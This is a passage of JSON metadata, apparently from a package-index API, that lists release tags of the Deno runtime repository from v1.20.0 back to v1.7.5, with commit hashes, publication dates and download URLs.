0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositor